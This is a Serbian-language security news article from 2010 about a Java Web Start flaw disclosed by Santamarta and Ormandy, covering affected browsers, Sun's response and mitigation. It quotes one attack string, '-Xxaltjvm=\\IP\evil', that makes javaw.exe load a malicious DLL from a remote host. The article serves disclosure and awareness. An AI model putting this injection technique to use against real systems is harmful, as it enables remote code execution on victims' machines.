Ozbiljan propust u novoj verziji Java pogađa sve aktuelne verzije Windows-a

Vesti, 12.04.2010, 01:37 AM

Postoji ranjivost u Java koja predstavlja ozbiljan problem jer ostavlja korisnike svih aktuelnih verzija Windows-a otvorenim za napade koji mogu dovesti do potpunog kompromitovanja pogođenog sistema. Dva istraživača su nezavisno jedan od drugog u petak objavili informacije o ranjivosti, tvrdeći da je ova ranjivost prisutna u okviru Java godinama unazad.

Problem leži u Java Web Strat framework, tehnologiji koju je razvio Sun Microsystems kako bi se omogućila jednostavnija primena Java aplikacija. U suštini, JavaWS tehnologija ne proverava parametre koje dobija od komandne linije, pa napadači mogu kontolisati ove parametre korišćenjem posebnih HTML oznaka na web strani, rekao je Ruben Santamarta u svom članku objavljenom u petak.

Tavis Ormandy je istog dana objavio svoj tekst o ovom nedostatku u Full Disclosure mailing list-u. Ormandy smatra da deaktiviranje Java dodatka nije dovoljno za prevenciju eventualnog iskorišćavanja ovog propusta, zbog toga što je ranjivi deo zasebno instaliran.

Ukratko, ukoliko imate poslednju verziju Java na svom kompjuteru, možete se smatrati pogođenim ovim propustom.

„Java.exe i javaw.exe podržavaju nepisani sakriveni parametar komandne linije „-XXaltjvm" i "-J-XXaltjvm" (videti -J switch u javaws.exe). Ovo upućuje Java da učita alternativnu JavaVM biblioteku (jvm.dll ili libjvm.so) sa željene putanje (path). Igra je završena. Možemo setovati -Xxaltjvm=\\IP\evil, na ovaj način javaw.exe će učitati naš loš jvm.dll. Bye, bye ASLR, DEP...“, piše Santamarta.

S obzirom da JavaWS tehnologija uključuje Java Runtime okruženje, koje se koristi u većini browser-a, ranjivost pogađa sve ove programe, uključujući Firefox, Internet Explorer i Chrome, na svim verzijama Windows-a, počev od Windows 2000 do Windows 7, tvrdi Santamarta. Browseri koji rade na Apple-ovom Mac OS X nisu ovim pogođeni.

U svom članku Ormandy kaže da je obavestio Sun o ovoj ranjivosti ali da proizvođač nije poverovao da je problem dovoljno ozbiljan i da zahteva urgentnu zakrpu.

„Programske alatke omogućavaju samo minimum provere URL parametara, dopuštajući nam dodavanje proizvoljnih parametara javaws programu, što obezbeđuje dovoljnu funkcionalnost preko komandne linije dozvoljavajući ovoj grešci da bude iskorišćena. Lakoća sa kojom ova greška može biti otkrivena uverila me je da je objavljivanje ovog dokumenta u najboljem interesu svih nas osim proizvođača,” kaže dalje u svom članku Ormandy.

Ovaj problem se može izbeći deaktiviranjem JavaWS i Java.exe, kaže Santamarta u svom postu.

Julien Tinnes daje dodatne informacije o ovoj vrsti Java ranjivosti.

Izvor: http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-browsers-040910


Prijavite se na našu mailing listu i primajte najnovije vesti (jednom dnevno) putem emaila svakog radnog dana besplatno:

Izdvojeno

Da li su vaše lozinke među najslabijim lozinkama?

Da li su vaše lozinke među najslabijim lozinkama?

Analiza više od 19 milijardi procurelih lozinki otkrila je i dalje prisutnu, široko rasprostranjenu pojavu ponovne upotrebe slabih lozinki. Lozinke,... Dalje

Prevare sa „tajanstvenim kutijama“ kradu podatke sa platnih kartica i novac sa računa kupaca

Prevare sa „tajanstvenim kutijama“ kradu podatke sa platnih kartica i novac sa računa kupaca

Istraživači kompanije Bitdefender upozorili su veoma sofisticirane prevare putem pretplata, za koje sajber kriminalci koriste „neverovatno ube... Dalje

Nalozi trećine korisnika interneta hakovani prošle godine zbog slabe lozinke

Nalozi trećine korisnika interneta hakovani prošle godine zbog slabe lozinke

Bar jedan onlajn nalog više od trećine (36%) ljudi prošle godine je hakovan zbog slabe ili ukradene lozinke, otkrilo je novo istraživanje FIDO al... Dalje

Google: Softverske ranjivosti nultog dana veoma tražene i sve ih je lakše nabaviti, a evo ko ih i zašto koristi

Google: Softverske ranjivosti nultog dana veoma tražene i sve ih je lakše nabaviti, a evo ko ih i zašto koristi

Sajber kriminalci su koristili najmanje 75 bezbednosnih ranjivosti za koje proizvođači softvera nisu znali - takozvane nulte ranjivosti - otkriva iz... Dalje

Microsoft glavna meta fišing napada, Mastercard se vratio na listu najčešće zloupotrebljavanih brendova

Microsoft glavna meta fišing napada, Mastercard se vratio na listu najčešće zloupotrebljavanih brendova

Microsoft je i dalje brend koji se najviše zloupotrebljava u fišing napadima. Ime tehnološkog giganta pojavljuje se u više od trećine (36%) svih ... Dalje